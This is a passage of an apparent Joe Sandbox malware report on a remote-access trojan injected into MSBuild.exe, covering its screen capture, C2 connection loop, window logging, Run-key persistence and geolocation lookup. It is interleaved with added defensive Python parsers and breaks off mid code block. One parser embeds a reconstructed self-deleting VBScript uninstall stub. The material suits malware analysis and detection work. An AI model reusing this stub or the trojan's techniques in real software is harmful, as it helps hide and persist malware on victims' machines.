                                                                                                • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                • GlobalFree.KERNELBASE(?), ref: 0041834B
                                                                                                • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                • DeleteDC.GDI32(?), ref: 00418398
                                                                                                • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                • String ID: DISPLAY
                                                                                                • API String ID: 1765752176-865373369
                                                                                                • Opcode ID: db294d146bd71bc66e28a643656ffa8b34653d290241f577acdad01abfd34b12
                                                                                                • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                • Opcode Fuzzy Hash: db294d146bd71bc66e28a643656ffa8b34653d290241f577acdad01abfd34b12
                                                                                                • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
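The record above is the GDI screen-capture routine (display DC, memory DC, compatible bitmap, StretchBlt, GetDIBits). The following parser, added here as an example and not part of the Joe Sandbox report or of the sample, turns the report's "APIs" listing into structured records so the sequence can be checked mechanically across many reports. The sample lines are copied from this report's own API lists (the screenshot routine at 417F9F and the connection loop at 413FD4) and joined into one snippet for demonstration; the SCREENSHOT_CHAIN signature and the alternative names it accepts (CreateDCW, GetDC, BitBlt) are the editor's assumptions about what a screenshot routine looks like, not something the report states.

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox report into records.

SAMPLE below is copied from the report's API lists for the GDI screenshot routine
at 0x417F9F and the connection loop at 0x413FD4 and joined here for demonstration;
it is not a report export.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# One report line: "• Api.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR:" and optionally without an argument list
# (e.g. "WSAGetLastError.WS2_32 ref: 00414249").
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_DWORD = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                   # address of the call instruction
    subcall_of: Optional[int]  # callee that actually issues the call, if any


def parse_api_lines(text: str) -> list:
    """Return the ApiCall records found in a block of report text, in listing order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "APIs" or "Strings" are skipped
        raw = m["args"] or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def summarize(calls) -> dict:
    """Per-API and per-module call counts plus literal (non-hex, non-'?') arguments."""
    literals = {a for c in calls for a in c.args if a != "?" and not HEX_DWORD.match(a)}
    return {
        "apis": Counter(c.api for c in calls),
        "modules": Counter(c.module for c in calls),
        "literal_args": literals,
    }


def matches_chain(calls, chain) -> bool:
    """True if the direct calls (subcalls excluded) contain `chain` as an ordered
    subsequence. Each step is a set of acceptable API names."""
    step = 0
    for c in calls:
        if c.subcall_of is None and step < len(chain) and c.api in chain[step]:
            step += 1
    return step == len(chain)


# Assumed GDI screen-capture sequence: display DC, memory DC, bitmap, select, blit, read pixels.
SCREENSHOT_CHAIN = (
    {"CreateDCA", "CreateDCW", "GetDC"},
    {"CreateCompatibleDC"},
    {"CreateCompatibleBitmap"},
    {"SelectObject"},
    {"BitBlt", "StretchBlt"},
    {"GetDIBits"},
)

SAMPLE = """\
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
• CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
• SelectObject.GDI32(00000000,00000000), ref: 0041806B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
• DeleteDC.GDI32(?), ref: 0041827F
• WSAGetLastError.WS2_32 ref: 00414249
"""

CALLS = parse_api_lines(SAMPLE)

if __name__ == "__main__":
    print(summarize(CALLS))
    print("screenshot chain:", matches_chain(CALLS, SCREENSHOT_CHAIN))
```

Subcall entries are kept as records (they carry the callee address) but excluded from chain matching, because their ref addresses belong to a different function and would otherwise break the ordering assumption.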

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 516 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 529 414021-414028 Sleep 516->529 530 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 516->530 529->530 545 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 530->545 546 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 530->546 599 41419a-4141a1 545->599 600 41418c-414198 545->600 546->545 601 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 599->601 600->601 628 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 601->628 629 41428f-41429d call 4041f1 601->629 651 414b54-414b66 call 4047eb call 4020b4 628->651 634 4142ca-4142df call 404915 call 40428c 629->634 635 41429f-4142c5 call 401f66 * 2 call 41a686 629->635 650 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 634->650 634->651 635->651 716 414434-414441 call 40541d 650->716 717 414446-41446d call 401e8f call 412513 650->717 665 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 651->665 666 414b8e-414b96 call 401d8c 651->666 665->666 666->545 716->717 723 414474-4145a8 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 717->723 724 41446f-414471 717->724 759 4145ad-414ac7 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 723->759 724->723 970 414ac9-414ad0 759->970 971 414adb-414ae2 759->971 970->971 972 414ad2-414ad4 970->972 973 414ae4-414ae9 call 40a767 971->973 974 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 971->974 972->971 985 414b22-414b2e CreateThread 974->985 986 414b34-414b4f call 401eea * 2 call 401e13 974->986 985->986 986->651
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                                • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                • API String ID: 524882891-329437720
                                                                                                • Opcode ID: 8c996d5790ba2b5d8a6eb0518af1636d89e77a6c8b5d3fceba9462056eaebe34
                                                                                                • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                • Opcode Fuzzy Hash: 8c996d5790ba2b5d8a6eb0518af1636d89e77a6c8b5d3fceba9462056eaebe34
                                                                                                • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 993 40bf04-40bf1a call 411699 996 40bf26-40bf2f 993->996 997 40bf1c-40bf21 call 40afba 993->997 999 40bf31 call 418c08 996->999 1000 40bf36-40bf3d 996->1000 997->996 999->1000 1002 40bf50-40bf60 1000->1002 1003 40bf3f-40bf4b call 401e07 call 41b42f 1000->1003 1005 40bf62-40bf71 call 401e07 call 41297a 1002->1005 1006 40bf77-40bf82 1002->1006 1003->1002 1020 40bf76 1005->1020 1007 40bf84-40bf90 call 401e07 call 41297a 1006->1007 1008 40bf96-40bf9c 1006->1008 1025 40bf95 1007->1025 1012 40bfb3-40c007 call 436050 call 4022f8 call 401e8f * 2 call 41265d 1008->1012 1013 40bf9e-40bfb2 call 401e07 call 41297a 1008->1013 1035 40c019-40c047 call 401e8f RegDeleteKeyA call 406a1a 1012->1035 1036 40c009-40c013 GetModuleFileNameW 1012->1036 1013->1012 1020->1006 1025->1008 1041 40c058-40c11d SetFileAttributesW call 41ab38 call 41ae08 call 4028cf call 401e13 call 401eea call 43ac0f call 403b40 call 4028cf call 403cdc call 401e13 * 2 call 403b40 call 403cbb call 401e13 1035->1041 1042 40c049-40c056 call 401e07 SetFileAttributesW 1035->1042 1036->1035 1073 40c176-40c1d0 call 403b40 call 4028cf * 2 call 402de3 call 401e13 * 3 1041->1073 1074 40c11f-40c171 call 403b40 call 403cbb call 4028cf call 402de3 call 401e13 * 3 1041->1074 1042->1041 1102 40c1e0-40c1f0 call 406a1a 1073->1102 1103 40c1d2-40c1db call 4082d2 1073->1103 1074->1073 1107 40c1f2-40c22a call 40b0dd call 4028cf call 402de3 call 401e13 * 2 1102->1107 1108 40c22f-40c26b call 4082d2 call 401e07 call 4022f8 call 401e07 call 41b58f 1102->1108 1103->1102 1107->1108 1128 40c286-40c287 ExitProcess 1108->1128 1129 40c26d-40c280 call 401e07 ShellExecuteW 1108->1129 1129->1128
                                                                                                APIs
                                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                • API String ID: 3797177996-1998216422
                                                                                                • Opcode ID: 2dc6bcc30e7d91a4770785caf6a30b96f2a8f13afe6c018fb0bd79822a2bffc2
                                                                                                • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                • Opcode Fuzzy Hash: 2dc6bcc30e7d91a4770785caf6a30b96f2a8f13afe6c018fb0bd79822a2bffc2
                                                                                                • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
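The record above is the uninstall routine: it deletes its HKCU Run-key entry (RegDeleteKeyA with 80000001), clears the file attributes of the binary, writes a .vbs into Temp from the fragments in the string list (On Error Resume Next, Scripting.FileSystemObject, while fso.FileExists(" ... fso.DeleteFile " ... wend, fso.DeleteFolder ", fso.DeleteFile(Wscript.ScriptFullName)), launches it with ShellExecuteW "open" and then calls ExitProcess, so the script can delete the still-running executable once the process is gone. The triage function below, added here as an example and not part of the report or of the sample, flags a dropped .vbs that carries that pattern. MALICIOUS_VBS is constructed by assembling the listed fragments; the line order and the paths under C:\Users\victim are assumptions, not a capture, and BENIGN_VBS is a constructed control.

```python
"""Triage a dropped .vbs for the self-deleting uninstall stub whose fragments appear
in the report's string list.

MALICIOUS_VBS is constructed from those fragments; its line order and paths are
assumptions. BENIGN_VBS is a constructed FileSystemObject script used as a control.
"""
import re

# Each indicator is one fragment from the report's string list, anchored so that a
# legitimate FileSystemObject script does not trip it by accident.
INDICATORS = {
    "errors_suppressed": re.compile(r"^\s*On Error Resume Next\s*$", re.I | re.M),
    "fso_created": re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    # Busy-wait until the binary is gone: loop while FileExists(), deleting on each pass.
    "spin_until_deleted": re.compile(
        r"while\s+fso\.FileExists\([^\n]*\)[^\n]*\n\s*fso\.DeleteFile[^\n]*\n\s*wend\b", re.I
    ),
    "deletes_folder": re.compile(r'fso\.DeleteFolder\s+"', re.I),
    "self_delete": re.compile(r"fso\.DeleteFile\s*\(\s*Wscript\.ScriptFullName\s*\)", re.I),
}
# Quoted paths passed to DeleteFile / DeleteFolder (the script's own self-delete is not quoted).
DELETE_TARGET = re.compile(r'fso\.Delete(?:File|Folder)\s+"([^"]+)"', re.I)


def triage_vbs(text: str) -> dict:
    """Return which indicators fired, the on-disk paths the script removes, and a verdict.

    The verdict requires the FileExists/DeleteFile/wend loop plus self-deletion: together
    they are the uninstall stub, whereas a FileSystemObject alone is ordinary admin scripting.
    """
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    hits["targets"] = DELETE_TARGET.findall(text)
    hits["verdict"] = hits["fso_created"] and hits["spin_until_deleted"] and hits["self_delete"]
    return hits


# Constructed sample assembled from the report's string fragments; paths are hypothetical.
MALICIOUS_VBS = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\Users\victim\AppData\Roaming\update\update.exe")
fso.DeleteFile "C:\Users\victim\AppData\Roaming\update\update.exe"
wend
fso.DeleteFolder "C:\Users\victim\AppData\Roaming\update"
fso.DeleteFile(Wscript.ScriptFullName)
'''

# Constructed benign control: uses FileSystemObject but neither loops on deletion nor removes itself.
BENIGN_VBS = r'''Set fso = CreateObject("Scripting.FileSystemObject")
Set log = fso.OpenTextFile("C:\logs\build.log", 8, True)
log.WriteLine "build finished"
log.Close
'''

if __name__ == "__main__":
    for label, script in (("malicious", MALICIOUS_VBS), ("benign", BENIGN_VBS)):
        print(label, triage_vbs(script))
```

The extracted targets are the useful output for incident response: they name the binary and folder the RAT was installed under, which is what the Run-key value and the file-system timeline should be checked against.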

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                • API String ID: 3795512280-3163867910
                                                                                                • Opcode ID: 3d513030585ca1f0b7a1cebd0501873cfe1ee9b5c501f3c741bf3b4b21dc813c
                                                                                                • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                • Opcode Fuzzy Hash: 3d513030585ca1f0b7a1cebd0501873cfe1ee9b5c501f3c741bf3b4b21dc813c
                                                                                                • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 1230 40428c-4042ad connect 1231 4043e1-4043e5 1230->1231 1232 4042b3-4042b6 1230->1232 1235 4043e7-4043f5 WSAGetLastError 1231->1235 1236 40445f 1231->1236 1233 4043da-4043dc 1232->1233 1234 4042bc-4042bf 1232->1234 1237 404461-404465 1233->1237 1238 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1234->1238 1239 4042eb-4042f5 call 420151 1234->1239 1235->1236 1240 4043f7-4043fa 1235->1240 1236->1237 1238->1239 1252 404306-404313 call 420373 1239->1252 1253 4042f7-404301 1239->1253 1242 404439-40443e 1240->1242 1243 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1240->1243 1245 404443-40445c call 401f66 * 2 call 41a686 1242->1245 1243->1236 1245->1236 1265 404315-404338 call 401f66 * 2 call 41a686 1252->1265 1266 40434c-404357 call 420f34 1252->1266 1253->1245 1292 40433b-404347 call 420191 1265->1292 1277 404389-404396 call 4202ea 1266->1277 1278 404359-404387 call 401f66 * 2 call 41a686 call 420592 1266->1278 1288 404398-4043bb call 401f66 * 2 call 41a686 1277->1288 1289 4043be-4043d7 CreateEventW * 2 1277->1289 1278->1292 1288->1289 1289->1233 1292->1236
                                                                                                APIs
                                                                                                • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                • API String ID: 994465650-2151626615
                                                                                                • Opcode ID: 038be6f33a456a912a7141f7e6ebadd8fcb208e6641f70431febe428b3a5382d
                                                                                                • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                • Opcode Fuzzy Hash: 038be6f33a456a912a7141f7e6ebadd8fcb208e6641f70431febe428b3a5382d
                                                                                                • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                                                • API String ID: 911427763-3954389425
                                                                                                • Opcode ID: 9487376d067a584a435570b7c8b001f1ddb8e28b6fa1212fc905e468af575a11
                                                                                                • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                • Opcode Fuzzy Hash: 9487376d067a584a435570b7c8b001f1ddb8e28b6fa1212fc905e468af575a11
                                                                                                • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 1385 40c89e-40c8c3 call 401e52 1388 40c8c9 1385->1388 1389 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1385->1389 1390 40c8d0-40c8d5 1388->1390 1391 40c9c2-40c9c7 1388->1391 1392 40c905-40c90a 1388->1392 1393 40c9d8 1388->1393 1394 40c9c9-40c9ce call 43ac0f 1388->1394 1395 40c8da-40c8e8 call 41a74b call 401e18 1388->1395 1396 40c8fb-40c900 1388->1396 1397 40c9bb-40c9c0 1388->1397 1398 40c90f-40c916 call 41b15b 1388->1398 1413 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1389->1413 1401 40c9dd-40c9e2 call 43ac0f 1390->1401 1391->1401 1392->1401 1393->1401 1405 40c9d3-40c9d6 1394->1405 1417 40c8ed 1395->1417 1396->1401 1397->1401 1414 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1398->1414 1415 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1398->1415 1410 40c9e3-40c9e8 call 4082d7 1401->1410 1405->1393 1405->1410 1410->1389 1423 40c8f1-40c8f6 call 401e13 1414->1423 1415->1417 1417->1423 1423->1389
                                                                                                APIs
                                                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongNamePath
                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                • API String ID: 82841172-425784914
                                                                                                • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                                Control-flow Graph

Basic blocks (id: address range, calls made in the block -> successor blocks):
• 1615: 41a51b-41a55a, call 401faa, call 43a88c, InternetOpenW, InternetOpenUrlW -> 1620
• 1620: 41a55c-41a57d, InternetReadFile -> 1621, 1622
• 1621: 41a5a3-41a5a6 -> 1623, 1624
• 1622: 41a57f-41a59f, call 401f86, call 402f08, call 401eea -> 1621
• 1623: 41a5a8-41a5aa -> 1620, 1624
• 1624: 41a5ac-41a5b9, InternetCloseHandle x2, call 43a887 -> 1628
• 1628: 41a5be-41a5c8 -> (exit)
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                Strings
                                                                                                • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                • API String ID: 3121278467-91888290
                                                                                                • Opcode ID: bc33eb6b94fe27f6a6150d03e83e24c652b8e94ed64a6a2357a004aa9bac096d
                                                                                                • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                • Opcode Fuzzy Hash: bc33eb6b94fe27f6a6150d03e83e24c652b8e94ed64a6a2357a004aa9bac096d
                                                                                                • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
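The flattened control_flow_graph lines in this report encode each function's basic blocks (block id, an address or address range, the calls made from the block, with "* N" repeating the previous call N times) followed by the edges as source->target. The Python below is an added example and is not part of the Joe Sandbox report or of the analysed sample; it parses that format and reports, per imported API, how many call sites exist and whether the call sits on a cycle. The embedded sample graph is the geoplugin function record above, copied verbatim; the sub_ prefix for internal call targets and all function names are this example's own conventions.

```python
import re
from collections import defaultdict

# Constructed sample: the control_flow_graph line of the geoplugin function
# record on this page, copied verbatim from the report.
SAMPLE_CFG = (
    "control_flow_graph 1615 41a51b-41a55a call 401faa call 43a88c "
    "InternetOpenW InternetOpenUrlW 1620 41a55c-41a57d InternetReadFile "
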